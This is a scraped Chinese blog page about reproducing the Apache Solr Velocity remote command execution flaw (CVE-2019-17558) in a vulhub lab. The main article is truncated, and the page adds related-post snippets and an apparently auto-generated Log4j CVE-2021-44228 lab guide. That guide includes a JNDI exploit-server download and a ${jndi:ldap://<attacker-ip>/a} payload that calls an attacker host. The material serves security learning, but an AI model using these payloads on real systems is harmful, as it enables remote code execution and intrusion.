[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558)

最新推荐文章于 2025-03-05 10:53:14 发布
最新推荐文章于 2025-03-05 10:53:14 发布
阅读量904 收藏 3
点赞数 1
分类专栏: [ 靶场实战 ] vulhub 文章标签: vulhub漏洞复现 Apache Solr RCE CVE-2019-17558 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_51577576/article/details/128167404
版权
本文详细介绍了Apache Solr的CVE-2019-17558远程命令执行漏洞的复现过程,包括环境搭建、漏洞复现步骤(启用配置、执行命令、getshell)、漏洞修复建议及相关资源。通过Velocity模板,攻击者可以执行任意代码,获取系统权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

一、漏洞编号

CVE-2019-17558

二、影响范围

Apache Solr 5.0.0 ~8.3.1

三、漏洞描述

Apache Velocity是一个基于Java的模板引擎&#

了解本专栏 订阅专栏 解锁全文 超级会员免费看
复现nuclei——CVE-2019-17558Apache Solr Velocity模板注入远程命令执行漏洞
记录并分享学习安全的知识点..
01-26 759
一、漏洞介绍 SolrApache Lucene项目的开源企业搜索平台。 其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本的处理。 2019年10月30日,国外安全研究人员放出了一个关于solr 模板注入的exp,攻击者经过未受权访问solr服务器,发送特定的数据包开启 params.resource.loader.enabled,而后get访问接口致使服务器命令执行。 影响版本:Apache Solr 5.0.0 ~8.3.1(暂不确定)到最新版本。 二、漏洞产生的原因
[ vulhub漏洞复现 ] solr 远程命令执行CVE-2019-0193)
qq_51577576的博客
12-08 723
[ vulhub漏洞复现 ] solr 远程命令执行CVE-2019-0193) 此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行
solr 历史漏洞复现RCE漏洞CVE-2019-17558
m0_66490812的博客
04-20 1489
优先复现 Solr RCE 漏洞,严重等级较高漏洞Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。
Apache Solr 注入RCE(CVE-2019-17558)--vulhub
ccc_9wy的博客
12-25 405
solr注入RCE漏洞复现CVE-2019-17558vulhub;反弹shell。
如何挖到自己的第一个src漏洞?从零基础到精通,收藏这就够了!
喜欢Python编程的程序员柚柚呀
03-05 713
前情交代:最近因为hw的事情比较忙,另外也比较瓶颈不知道写啥子了,然后团队里的F师傅就劝(逼迫)我去打一轮src(毕竟我是团队中唯一一个src零经验的菜狗),刷出结果了刚好能出一章教程,啊,先上结果,确实没打出什么样子来,其中五六个洞还是趁着无权重活动水出来的,所以分也低,洞也少。(截图为证,第一个交的洞是一个月前的)顺带捡了个cnvd编号:(但是不知道为什么还查不到,就不给你们看了)吐槽一下正常到这步可能很多人开始卖课了。
Vulhub漏洞复现---solr---CVE-2019-17558
weixin_74942037的博客
11-16 1086
Velocity模板可以通过configset ’ Velocity / '目录中的Velocity模板或作为参数提供。用户定义的configset可以包含可呈现的、潜在的恶意模板。参数提供的模板在默认情况下是禁用的,但是可以通过设置params.resource.loader来启用。定义响应编写器需要配置API访问。Solr 8.4完全删除了params资源加载器,只有在configset是“可信的”(由经过身份验证的用户上传)时才启用configset提供的模板呈现。配置未打开,无法使用自定义模板。
solr 远程命令执行 (CVE-2019-17558)
YouthBelief的博客
11-01 5996
solr 远程命令执行 (CVE-2019-17558前言一、solr 远程命令执行 (CVE-2019-17558)0x01 漏洞描述0x02 影响范围0x03 漏洞利用直接用脚本0x04 漏洞修复 前言 Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。 一、solr 远程命令执行 (CVE-2019-175
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
EC_Carrot的博客
07-31 543
漏洞简介 在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令。 漏洞复现 默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。我们先通过如下API获取所有的核心: http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json 我使用的是vulhub的环境,里面唯一的核心是demo,通过如下请求开启params.resource.loa
solr 远程命令执行漏洞复现 (CVE-2019-17558)
XXokok的博客
01-12 784
Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。
[ vulhub漏洞复现 ] solr 远程命令执行 (CVE-2017-12629-RCE)
qq_51577576的博客
12-07 716
[ vulhub漏洞复现 ] solr 远程命令执行 (CVE-2017-12629-RCE) Apache SolrApache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。
vulfocus——solr远程命令执行(CVE-2019-17558)
m0_62063669的博客
09-11 1051
Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。Velocity是一个基于Java的模板引擎,可以通过特定的语法获取在java对象的数据,填充到模板中,从而实现界面和java代码的分离。2.访问页面默认会有一个叫demo的core。4.注入Velocity模板即可执行任意命令。
Apache Solr Velocity远程命令执行漏洞CVE-2019-17558
whojoe的博客
07-06 1423
Apache Solr Velocity远程命令执行漏洞CVE-2019-17558)前言环境搭建漏洞复现参考文章 前言 影响Apache Solr 8.1.1到8.2.0版本 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/solr/CVE-2019-17558/ 启动容器 docker
Apache Solr Velocity注入远程命令执行(CVE-2019-17558)
m0_65150886的博客
02-27 618
2019年10月30日,国外安全研究人员放出了一个关于solr模板注入的exp,攻击者通过未授权访问solr服务器,发送特定的数据包开启params.resource.loader.enabled,然后通过get请求访问接口导致服务器命令执行。2.默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。我们先通过如下API获取所有的核心。3.通过如下请求开启params.resource.loader.enabled,其中API路径包含刚才获取的core名称。
vulhub CVE-2021-44228
最新发布
03-18
### CVE-2021-44228 漏洞复现环境搭建教程 #### 一、概述 CVE-2021-44228 是 Log4j2 的远程代码执行漏洞,影响范围广泛。为了研究该漏洞的工作原理及其潜在风险,可以通过 VulHub 靶场来快速构建复现环境。 --- #### 二、VulHub 环境准备 VulHub 是一个基于 Docker 和 Docker Compose 构建的安全漏洞学习平台,提供了多种常见漏洞复现环境。以下是针对 CVE-2021-44228 的具体操作步骤: 1. **安装依赖工具** - 安装 Docker 和 Docker Compose 工具。 - 确保系统已正确配置并运行 `docker` 和 `docker-compose` 命令[^2]。 2. **克隆 VulHub 仓库** 使用 Git 将 VulHub 项目克隆到本地: ```bash git clone https://github.com/vulhub/vulhub.git ``` 3. **切换至目标目录** 进入 CVE-2021-44228 对应的文件夹路径: ```bash cd vulhub/log4j/CVE-2021-44228/ ``` 4. **启动容器服务** 执行以下命令以启动所需的容器服务: ```bash docker-compose up -d ``` 此时会自动拉取必要的镜像并初始化环境。完成后可以访问 http://<your-ip>:8983 来查看 Apache Solr 的管理界面[^4]。 5. **验证环境状态** 如果一切正常,应该能够看到 Solr Dashboard 页面加载成功。这表明漏洞复现所需的服务已经就绪。 --- #### 三、漏洞利用测试 完成上述准备工作之后,可按照如下方法尝试触发 JNDI 注入攻击向量: 1. 下载用于模拟恶意行为的 Exploit 工具包: ```bash wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/jndi-exploit-server.jar ``` 2. 启动监听端口等待连接请求到来: ```bash java -jar jndi-exploit-server.jar <local-ip> ``` 3. 修改日志记录语句使其包含特定 payload 数据结构形式,例如 `${jndi:ldap://<attacker-ip>/a}` 并发送给目标应用程序处理逻辑部分去解析它从而实现 RCE 效果[^5]。 --- #### 四、清理工作 实验结束后务必及时停止所有正在运行中的实例资源以免造成不必要的安全隐患或者性能消耗等问题发生: ```bash docker-compose down ``` 此命令将会终止当前 session 中所有的关联进程并将它们移除掉同时释放所占用的相关物理硬件设备上的存储空间位置等宝贵计算资源[^3]。 --- ### 注意事项 - 实验应在隔离环境中进行,切勿对外网开放任何敏感接口。 - 测试完毕后需立即删除相关数据以防泄露隐私信息。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

寒蝉听雨[原ID_PowerShell]

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值